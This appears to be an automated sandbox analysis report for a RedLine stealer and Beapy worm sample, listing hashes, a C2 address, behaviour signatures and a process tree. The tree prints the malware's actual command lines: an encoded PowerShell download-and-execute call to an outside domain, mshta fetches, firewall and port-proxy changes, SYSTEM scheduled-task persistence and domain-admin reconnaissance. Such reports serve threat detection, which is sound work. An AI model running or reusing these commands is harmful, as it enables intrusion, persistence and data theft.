Resubmissions

05-04-2021 09:29

210405-8ga7y7zk36 10

03-04-2021 06:00

210403-gtexn6kycs 10

Analysis

  • max time kernel
    301s
  • max time network
    302s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-04-2021 09:29

General

  • Target

    Setup[1].exe

  • Size

    1.3MB

  • MD5

    0657125b7850a7b5796bf6979da502f0

  • SHA1

    686d1ad201f0706daec7dd9bfa60fd1144a7b876

  • SHA256

    c1a85afd7acdaf7ab0d6839cc68d67ca75455fa9fb3d62a95f6579f07899df49

  • SHA512

    879167e0b34e015e62828151a05b785f3f9b99e2826be73fe9afc4d671dedec19c9994d2481c060e453367885ba16cce0252e7049bdb59c5ee90885f6527e10c

Malware Config

Extracted

Family

redline

Botnet

010402

C2

194.135.20.72:3214

Signatures

  • Beapy

    Beapy is a python worm with crypto mining capabilities.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 19 IoCs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 13 IoCs
  • Detects Pyinstaller 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup[1].exe
    "C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:384
    • C:\Users\Admin\AppData\Local\Temp\Setup[1].exe
      "C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1084
  • C:\Windows\wsFeJZkc.exe
    C:\Windows\wsFeJZkc.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c call "c:\windows\temp\tmp.vbs"
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
        3⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c echo WjHqSrkT >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\hqLA.exe&move /y c:\windows\temp\dig.exe c:\windows\UhjnKz.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\UhjnKz.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\hqLA.exe"&schtasks /run /TN escan)
          4⤵
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add portopening tcp 65533 DNSd
            5⤵
            • Modifies data under HKEY_USERS
            PID:840
          • C:\Windows\SysWOW64\netsh.exe
            netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
            5⤵
            • Modifies data under HKEY_USERS
            PID:808
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
            5⤵
            • Creates scheduled task(s)
            PID:1636
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F
            5⤵
            • Creates scheduled task(s)
            PID:1624
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F
            5⤵
            • Creates scheduled task(s)
            PID:1000
  • C:\Windows\GoUzJnoA.exe
    C:\Windows\GoUzJnoA.exe
    1⤵
      PID:1488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c call "c:\windows\temp\tmp.vbs"
        2⤵
        • Modifies data under HKEY_USERS
        PID:1628
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
          3⤵
          • Modifies data under HKEY_USERS
          PID:736
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c echo uYckTIp >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)
            4⤵
            • Drops file in Windows directory
            PID:1996
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add portopening tcp 65533 DNSd
              5⤵
              • Modifies data under HKEY_USERS
              PID:1324
            • C:\Windows\SysWOW64\netsh.exe
              netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
              5⤵
              • Modifies data under HKEY_USERS
              PID:788
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
              5⤵
              • Creates scheduled task(s)
              PID:1968
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:1748
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c call "c:\windows\temp\tmp.vbs"
        2⤵
        • Modifies data under HKEY_USERS
        PID:1080
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
          3⤵
          • Modifies data under HKEY_USERS
          PID:1856
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c echo jhbajY >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)
            4⤵
            • Drops file in Windows directory
            PID:844
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add portopening tcp 65533 DNSd
              5⤵
              • Modifies data under HKEY_USERS
              PID:1908
            • C:\Windows\SysWOW64\netsh.exe
              netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
              5⤵
              • Modifies data under HKEY_USERS
              PID:1600
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
              5⤵
              • Creates scheduled task(s)
              PID:1660
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:1004
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:1708
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c call "c:\windows\temp\tmp.vbs"
        2⤵
        • Modifies data under HKEY_USERS
        PID:2912
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
          3⤵
          • Modifies data under HKEY_USERS
          PID:2952
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c echo FXvx >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\AQzNdfKa.exe&move /y c:\windows\temp\dig.exe c:\windows\XHHdn.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\XHHdn.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\AQzNdfKa.exe"&schtasks /run /TN escan)
            4⤵
            • Drops file in Windows directory
            PID:3000
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add portopening tcp 65533 DNSd
              5⤵
                PID:3044
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:1624
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:512
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2328
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2876
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          PID:2420
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
            • Modifies data under HKEY_USERS
            PID:2820
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo JsfCXd >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\dwnoz.exe&move /y c:\windows\temp\dig.exe c:\windows\DCioaAx.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\DCioaAx.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\dwnoz.exe"&schtasks /run /TN escan)
              4⤵
              • Drops file in Windows directory
              PID:2328
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add portopening tcp 65533 DNSd
                5⤵
                • Modifies data under HKEY_USERS
                PID:3004
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:3024
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:3084
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:3168
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:3300
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          PID:456
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
              PID:1864
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c call "c:\windows\temp\tmp.vbs"
            2⤵
            • Modifies data under HKEY_USERS
            PID:2964
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
              3⤵
              • Modifies data under HKEY_USERS
              PID:1596
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c echo pohWckK >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\aAKrYQe.exe&move /y c:\windows\temp\dig.exe c:\windows\ybZokV.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\ybZokV.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\aAKrYQe.exe"&schtasks /run /TN escan)
                4⤵
                • Drops file in Windows directory
                PID:1636
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add portopening tcp 65533 DNSd
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:3060
                • C:\Windows\SysWOW64\netsh.exe
                  netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                  5⤵
                  • Modifies data under HKEY_USERS
                  PID:1004
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2212
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2228
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2188
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {4F89A168-6683-436F-856F-CF330BDAE8DA} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\hqLA.exe
            C:\Windows\hqLA.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:320
            • C:\Windows\hqLA.exe
              C:\Windows\hqLA.exe
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1752
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c wmic ntdomain get domainname
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1148
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  wmic ntdomain get domainname
                  5⤵
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2020
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net localgroup administrators
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2044
                • C:\Windows\SysWOW64\net.exe
                  net localgroup administrators
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1972
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 localgroup administrators
                    6⤵
                      PID:576
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net group "domain admins" /domain
                  4⤵
                    PID:1628
                    • C:\Windows\SysWOW64\net.exe
                      net group "domain admins" /domain
                      5⤵
                        PID:1828
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 group "domain admins" /domain
                          6⤵
                            PID:1860
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Windows\m2.ps1"
                        4⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1988
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ipconfig /all
                        4⤵
                          PID:1004
                          • C:\Windows\SysWOW64\ipconfig.exe
                            ipconfig /all
                            5⤵
                            • Gathers network information
                            PID:956
                        • C:\Windows\SysWOW64\ipconfig.exe
                          ipconfig /all
                          4⤵
                          • Gathers network information
                          PID:1040
                        • C:\Windows\SysWOW64\netstat.exe
                          netstat -na
                          4⤵
                          • Gathers network information
